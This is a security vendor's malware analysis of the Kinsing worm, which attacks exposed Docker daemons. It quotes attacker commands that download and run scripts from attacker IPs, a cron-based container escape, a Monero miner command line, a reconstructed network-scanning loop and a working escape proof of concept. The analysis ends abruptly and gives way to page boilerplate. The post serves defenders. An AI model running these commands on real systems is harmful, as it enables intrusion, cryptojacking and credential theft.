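    # reach port 443 before the deny rule is ever consulted.
    aws ec2 create-network-acl-entry --network-acl-id acl-0123456789abcdef0 --ingress \
        --rule-number 100 --protocol tcp --port-range From=443,To=443 \
        --cidr-block 0.0.0.0/0 --rule-action allow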

  • AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers

    Cloud Security | Kinsing Punk: An Epic Escape From Docker Containers. Rony Moshkovich | 2 min read | Published 8/22/20
    We all remember how, a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it's déjà vu all over again, only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let's start with its simplest trick: the credentials grabber.
    AWS Credentials Grabber
    If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with the Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface (CLI) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using the AWS CLI programmatically. There is one little caveat, though. The AWS CLI stores your credentials in a clear-text file called ~/.aws/credentials. The documentation clearly explains that: "The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory." That means your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server.
    Hosting
    For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM, vulnerable to exploits. The attackers have compromised this server, installed the b374k webshell, and then uploaded several malicious files to it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236, where the worm hosts its own body, is a vulnerable Docker host.
    According to Shodan, this server currently hosts a malicious Docker container image, system_docker, which is spun up with the following parameters:
    ./nigix --tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x --currency monero --httpd 8080
    A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of the alpine container image:
    chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh'
    chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh'
    chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh'
    chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh'
    Docker Lan Pwner
    A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it's important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring the Docker daemon to listen for remote connections is easy. All it requires is one extra entry, -H tcp://127.0.0.1:2375, in the systemd unit file or the daemon.json file. Once configured and restarted, the daemon will expose port 2375 to remote clients:
    $ sudo netstat -tulpn | grep dockerd
    tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd
    To attack other hosts, the malware collects network segments for all network interfaces with the help of the ip route show command. For example, for an interface with an assigned IP of 192.168.20.25, the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24. For each collected network segment, it launches the masscan tool to probe each IP address from the specified segment, on the following ports:
    – 2375 (docker): Docker REST API (plain text)
    – 2376 (docker-s): Docker REST API (SSL)
    – 2377 (swarm): RPC interface for Docker Swarm
    – 4243 (docker): old Docker REST API (plain text)
    – 4244 (docker-basic-auth): authentication for the old Docker REST API
    The scan rate is set to 50,000 packets/second. For example, running the masscan tool over the CIDR block 192.168.20.0/24 on port 2375 may produce output similar to:
    $ masscan 192.168.20.0/24 -p2375 --rate=50000
    Discovered open port 2375/tcp on 192.168.20.25
    From the output above, the malware selects the word at the 6th position, which is the detected IP address. Next, the worm runs zgrab, a banner grabber utility, to send an HTTP request for "/v1.16/version" to the selected endpoint. Sending such a request to a local instance of a Docker daemon returns a JSON banner describing the daemon's version. Next, it applies the grep utility to parse the contents returned by zgrab, making sure the returned JSON contains either the "ApiVersion" or the "client version 1.16" string. The latest version of the Docker daemon will have "ApiVersion" in its banner. Finally, it will apply jq, a command-line JSON processor, to parse the JSON, extract the "ip" field from it, and return it as a string.
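    Pieced together, the discovery logic looks roughly like the shell sketch below. This is an illustrative reconstruction rather than the actual malware code: curl stands in for zgrab, and the CIDR block is the example value used above.
    #!/bin/sh
    # Rough reconstruction of the worm's Docker discovery loop (for illustration only)
    for port in 2375 2376 2377 4243 4244; do
        masscan 192.168.20.0/24 -p"$port" --rate=50000 2>/dev/null |
        awk '/Discovered open port/ {print $6}' |    # 6th field is the discovered IP address
        while read -r ip; do
            # Probe the Docker Engine API; exposed daemons answer with a version banner
            if curl -s -m 5 "http://$ip:$port/v1.16/version" | grep -q '"ApiVersion"'; then
                echo "$ip:$port exposes an unauthenticated Docker API"
            fi
        done
    done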
    With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run the Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script:
    docker -H tcp://[IP_ADDRESS]:[PORT] run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "curl [MALICIOUS_SCRIPT] | bash; …"
    The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We'll get down to this trick in a moment. For now, let's break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters:
    – the --rm switch will cause Docker to automatically remove the container when it exits
    – -v /:/mnt is a bind mount parameter that instructs the Docker runtime to mount the host's root directory / within the container as /mnt
    – chroot /mnt will change the root directory for the current running process into /mnt, which corresponds to the root directory / of the host
    – a malicious script to be downloaded and executed
    Escaping From the Docker Container
    The malicious script downloaded and executed within the alpine container first checks if the user's crontab, a special configuration file that specifies shell commands to run periodically on a given schedule, contains the string "129[.]211[.]98[.]236":
    crontab -l | grep -e "129[.]211[.]98[.]236" | grep -v grep
    If it does not contain such a string, the script will set up a new cron job with:
    echo "setup cron"
    ( crontab -l 2>/dev/null
    echo "* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1" ) | crontab -
    The code snippet above will suppress the "no crontab for username" message and create a new scheduled task to be executed every minute. The scheduled task consists of two parts: download and execute the malicious script, then delete all scheduled tasks from the crontab. This will effectively execute the scheduled task only once, with a one-minute delay. After that, the container image quits. There are two important points associated with this trick:
    – as the Docker container's root directory was mapped to the host's root directory /, any task scheduled inside the container will be automatically scheduled in the host's root crontab
    – as the Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in root's crontab, to be executed as root
    Building a PoC
    To test this trick in action, let's create a shell script that prints "123" into a file _123.txt located in the root directory /:
    echo "setup cron"
    ( crontab -l 2>/dev/null
    echo "* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1" ) | crontab -
    Next, let's pass this script encoded in base64 format to the Docker daemon running on the local host:
    docker -H tcp://127.0.0.1:2375 run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "echo '[OUR_BASE_64_ENCODED_SCRIPT]' | base64 -d | bash"
    Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers:
    $ docker -H tcp://127.0.0.1:2375 ps
    CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
    An important question now is whether the crontab job was created inside the (now destroyed) Docker container or on the host.
If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
